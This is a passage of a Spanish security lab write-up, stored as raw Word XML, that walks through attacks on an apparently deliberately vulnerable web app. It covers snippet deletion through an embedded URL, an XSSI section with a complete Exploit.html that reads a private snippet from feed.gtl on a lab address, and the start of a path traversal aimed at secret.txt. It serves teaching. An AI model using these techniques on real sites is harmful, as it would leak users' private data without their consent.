            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="50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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="207DD71E" w14:textId="5FB82B96" w:rsidR="00DF529E" w:rsidRDefault="00DF529E" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora cade vez que se coloque un fragmento y se </w:t>
      </w:r>
      <w:r w:rsidR="00C57F5D">
        <w:t>actualice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> la página de </w:t>
      </w:r>
      <w:r w:rsidR="00C57F5D">
        <w:t>inicio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> desaparecerá:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0FAA9A" w14:textId="488CDC1F" w:rsidR="00DF529E" w:rsidRDefault="00DF529E" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF529E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1102D48D" wp14:editId="67D7455D">
            <wp:extent cx="5400040" cy="5805170"/>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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE57B35" w14:textId="59B6DB1B" w:rsidR="00DF529E" w:rsidRDefault="00DF529E" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF529E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28C6594A" wp14:editId="752F8A4B">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0"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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57007A91" w14:textId="676BFFE8" w:rsidR="00DF529E" w:rsidRDefault="00DF529E" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF529E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10FA6B8B" wp14:editId="0EDA017E">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35455068" w14:textId="074203CF" w:rsidR="000C3124" w:rsidRDefault="000C3124" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Para desencadenar este ataque, podríamos atraer a una víctima para que navegue por una página donde está incrustada esta URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597D4262" w14:textId="6CE4B156" w:rsidR="000C3124" w:rsidRDefault="000C3124" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora miraremos el código </w:t>
      </w:r>
      <w:r w:rsidR="00C57F5D">
        <w:t>del</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> formulario de editar perfil, el código acepta cualquier texto que estemos escribiendo sin ninguna verificación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443B1EC5" w14:textId="045E88FC" w:rsidR="000C3124" w:rsidRDefault="000C3124" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0721421D" w14:textId="69B0C51F" w:rsidR="000C3124" w:rsidRDefault="000C3124" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D872F92" w14:textId="033C9949" w:rsidR="000C3124" w:rsidRDefault="000C3124" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cuando incluimos la función deletesnippet?index=?0 en el formulario de icono, y después de </w:t>
      </w:r>
      <w:r w:rsidR="00C57F5D">
        <w:t>actualizar</w:t>
      </w:r>
      <w:r>
        <w:t>, esto activa una acción en el servidor con la función def_DoDeletesnippet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7403577C" w14:textId="3F401AE6" w:rsidR="000C3124" w:rsidRDefault="000C3124" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1954B4DC" w14:textId="3970E6FB" w:rsidR="000C3124" w:rsidRDefault="000C3124" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="000C3124">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B5A0A1E" wp14:editId="435107B0">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2E137D" w14:textId="61AE8829" w:rsidR="00342422" w:rsidRDefault="00342422" w:rsidP="00342422">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FAA8081" w14:textId="548550E0" w:rsidR="00342422" w:rsidRDefault="00342422">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc128034167"/>
      <w:r>
        <w:t>Inclusión de secuencias de comandos entre sitios (XSSI)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="197C755F" w14:textId="77777777" w:rsidR="002E4B09" w:rsidRPr="002E4B09" w:rsidRDefault="002E4B09" w:rsidP="002E4B09"/>
    <w:p w14:paraId="6F8F7C73" w14:textId="52A7E1F6" w:rsidR="00F929E9" w:rsidRDefault="00F929E9" w:rsidP="00F929E9">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>XSSI es un ataque del lado del cliente similar a Cross Site Request Forgery (CSRF) pero con un propósito diferente. Donde CSRF usa el contexto del usuario autentificado para ejecutar ciertas acciones de cambio de estado dentro de la página de una víctima, XSSI usa JavaScript para filtrar datos confidenciales de sesiones autentificadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D948A3D" w14:textId="44B0E279" w:rsidR="002918A6" w:rsidRDefault="002918A6" w:rsidP="00F929E9">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Lo que vamos a hacer es filtrar información referente a un fragmento privado en la aplicación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ED0456" w14:textId="48BF8968" w:rsidR="00410981" w:rsidRDefault="00410981" w:rsidP="00F929E9">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Esta es la información sensible que vamos a filtrar:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77074088" w14:textId="258D615C" w:rsidR="00410981" w:rsidRDefault="00410981" w:rsidP="00F929E9">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00410981">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="245867E8" wp14:editId="73DAA233">
            <wp:extent cx="5400040" cy="4586605"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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4586605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDCD060" w14:textId="6DEC1D56" w:rsidR="00410981" w:rsidRDefault="00410981" w:rsidP="00F929E9">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="292C32"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="292C32"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Podemos ver que el /feed.gtl revela información sobre nuestro fragmento privado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162E63D5" w14:textId="1CA3ED72" w:rsidR="00410981" w:rsidRDefault="00410981" w:rsidP="00F929E9">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="292C32"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00410981">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:noProof/>
          <w:color w:val="292C32"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57D8FD8A" wp14:editId="379DE500">
            <wp:extent cx="5400040" cy="429196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4291965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F516B9" w14:textId="77777777" w:rsidR="00410981" w:rsidRDefault="00410981" w:rsidP="00F929E9">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7274F1AD" w14:textId="6FDCC61F" w:rsidR="002918A6" w:rsidRDefault="002918A6" w:rsidP="00F929E9">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Para ese propósito vamos a crear este código llamado Exploit.html:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A98109" w14:textId="3A06C1F6" w:rsidR="002918A6" w:rsidRDefault="002918A6" w:rsidP="00F929E9">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4573D748" w14:textId="2FE29756" w:rsidR="001E13E4" w:rsidRPr="00312E63" w:rsidRDefault="001E13E4" w:rsidP="001E13E4">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;html lang="en"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;head&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    &lt;meta charset="UTF-8"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    &lt;title&gt;Exploit&lt;/title&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;/head&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;body&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    function _feed(s) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        alert("Your private snippet is: " + s['private_snippet']);</w:t>
      </w:r>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;script src="http://192.168.1.99:8080/669342714295315058662060109297120325372/feed.gtl"&gt;&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D49A08" w14:textId="5125EBF0" w:rsidR="001E13E4" w:rsidRDefault="001E13E4" w:rsidP="001E13E4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36D93785" w14:textId="7D1C7500" w:rsidR="001E13E4" w:rsidRDefault="001E13E4" w:rsidP="001E13E4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ejecuto el HTML:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C17A4F" w14:textId="647E0589" w:rsidR="001E13E4" w:rsidRDefault="001E13E4" w:rsidP="001E13E4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51A734A2" w14:textId="5BD6B5D7" w:rsidR="001E13E4" w:rsidRDefault="001E13E4" w:rsidP="001E13E4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="001E13E4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A4106B4" wp14:editId="4727C5A9">
            <wp:extent cx="5400040" cy="2902585"/>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2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="570AE3F4" w14:textId="2051885B" w:rsidR="001E13E4" w:rsidRDefault="001E13E4" w:rsidP="001E13E4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72E8DD07" w14:textId="760735B1" w:rsidR="001E13E4" w:rsidRDefault="001E13E4" w:rsidP="001E13E4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Y ahora veremos el valor de feed.gtl:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA3B885" w14:textId="5CEA8B79" w:rsidR="001E13E4" w:rsidRDefault="001E13E4" w:rsidP="001E13E4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF593E6" w14:textId="34C5AE74" w:rsidR="001E13E4" w:rsidRDefault="00410981" w:rsidP="001E13E4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00410981">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FE58111" wp14:editId="3B4A0B40">
            <wp:extent cx="5400040" cy="2501265"/>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2501265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC265FE" w14:textId="7F346D0E" w:rsidR="00037110" w:rsidRDefault="00037110" w:rsidP="001E13E4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="067A3269" w14:textId="18EC8C5C" w:rsidR="001E13E4" w:rsidRDefault="001E13E4" w:rsidP="001E13E4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45D17153" w14:textId="77777777" w:rsidR="001E13E4" w:rsidRPr="001E13E4" w:rsidRDefault="001E13E4" w:rsidP="001E13E4">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="304BC632" w14:textId="77777777" w:rsidR="004A3C05" w:rsidRDefault="004A3C05" w:rsidP="00F929E9">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2249613D" w14:textId="77777777" w:rsidR="002918A6" w:rsidRDefault="002918A6" w:rsidP="00F929E9">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="360B2B70" w14:textId="3A5F03BA" w:rsidR="00F929E9" w:rsidRDefault="00F929E9">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc128034168"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Path Transversal</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="6A1ECC49" w14:textId="4F009C66" w:rsidR="00F929E9" w:rsidRDefault="00F929E9" w:rsidP="00F929E9">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4219F454" w14:textId="0B298F1C" w:rsidR="00F929E9" w:rsidRDefault="00F929E9" w:rsidP="00F929E9">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una técnica común es el Path Transversal para acceder a archivos fuera </w:t>
      </w:r>
      <w:r w:rsidR="00550180">
        <w:t>del</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> directorio deseado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264A55D6" w14:textId="18EE49D9" w:rsidR="00F929E9" w:rsidRDefault="00F929E9" w:rsidP="00F929E9">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Un atacante pude ser capaz de leer un archivo no deseado, lo que resulta en la divulgación de información confidencial. O bien, un atacante puede escribir en un archivo no deseado, lo que resulta en la modificación no autorizada de datos confidenciales o comprometer la seguridad del servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0248B36A" w14:textId="19AC6611" w:rsidR="00F929E9" w:rsidRDefault="00F929E9" w:rsidP="00F929E9">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Esquema de ataque:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D461F6" w14:textId="56FB9DE1" w:rsidR="00F929E9" w:rsidRDefault="00F929E9" w:rsidP="00F929E9">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FF01DE8" wp14:editId="54B5BCBF">
            <wp:extent cx="5400040" cy="5490210"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="234" name="Imagen 234" descr="Directory Traversal — Web-based Application Security, Part 8 | Sp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rectory Traversal — Web-based Application Security, Part 8 | Spanni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00040" cy="5490210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE491E4" w14:textId="17792DBE" w:rsidR="00851061" w:rsidRDefault="00851061" w:rsidP="00F929E9">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Explotación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E076072" w14:textId="1C78B062" w:rsidR="009E5E8E" w:rsidRPr="00F929E9" w:rsidRDefault="00851061" w:rsidP="00F929E9">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Primero </w:t>
      </w:r>
      <w:r w:rsidR="00C57F5D">
        <w:t>iniciaremos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C57F5D">
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">urp </w:t>
      </w:r>
      <w:r w:rsidR="00C57F5D">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>uite y revisaremos el mapa del sito:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219E5B5B" w14:textId="77777777" w:rsidR="00810052" w:rsidRPr="00810052" w:rsidRDefault="00810052" w:rsidP="00810052"/>
    <w:p w14:paraId="62E674D1" w14:textId="41E4124C" w:rsidR="00AD59DD" w:rsidRDefault="00F4573C" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Podremos ver que hay un archivo secret.txt, este será nuestro objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659ED3BC" w14:textId="7A2472FE" w:rsidR="00F4573C" w:rsidRDefault="00F4573C" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ahora a lugar donde se suben los archivos, usaremos el usuario con nombre ‘usuario’ y contraseña ‘usuario’</w:t>
      </w:r>
      <w:r w:rsidR="00132129">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635C7FA5" w14:textId="632FE02F" w:rsidR="00132129" w:rsidRDefault="00132129" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Vamos a poner /u</w:t>
      </w:r>
      <w:r w:rsidR="00417B66">
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>load.gtl, archivo de la aplicación web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593469CA" w14:textId="4ACB62A4" w:rsidR="00132129" w:rsidRDefault="00132129" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77941BDF" w14:textId="5A2B80C4" w:rsidR="00132129" w:rsidRDefault="00132129" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00132129">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0515B16C" wp14:editId="34AFDFDA">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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00040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F7BF7C" w14:textId="78C851C8" w:rsidR="00132129" w:rsidRDefault="00132129" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Accedemos a esta página lo cual es el comportamiento esperado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F667F5" w14:textId="09B7FD18" w:rsidR="00132129" w:rsidRDefault="00132129" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora probaremos un /upload.gtl/text:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72752A67" w14:textId="13E8A376" w:rsidR="00132129" w:rsidRDefault="00132129" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ED3AB06" w14:textId="1F011DDE" w:rsidR="00132129" w:rsidRDefault="00132129" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00132129">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EA1724D" wp14:editId="624F807D">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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00040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E39B0E" w14:textId="1467AF80" w:rsidR="00132129" w:rsidRDefault="00132129" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68C46D42" w14:textId="18422F0F" w:rsidR="00132129" w:rsidRDefault="00132129" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este es el resultado pues no existe el </w:t>
      </w:r>
      <w:r w:rsidR="00693F88">
        <w:t>directorio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1412BD" w14:textId="40FB9FCF" w:rsidR="008A436D" w:rsidRDefault="008A436D" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>-Mirar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102EABDB" w14:textId="718464E5" w:rsidR="008A436D" w:rsidRDefault="008A436D" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Ruta archivo secret.txt</w:t>
      </w:r>
      <w:r w:rsidR="00250F98">
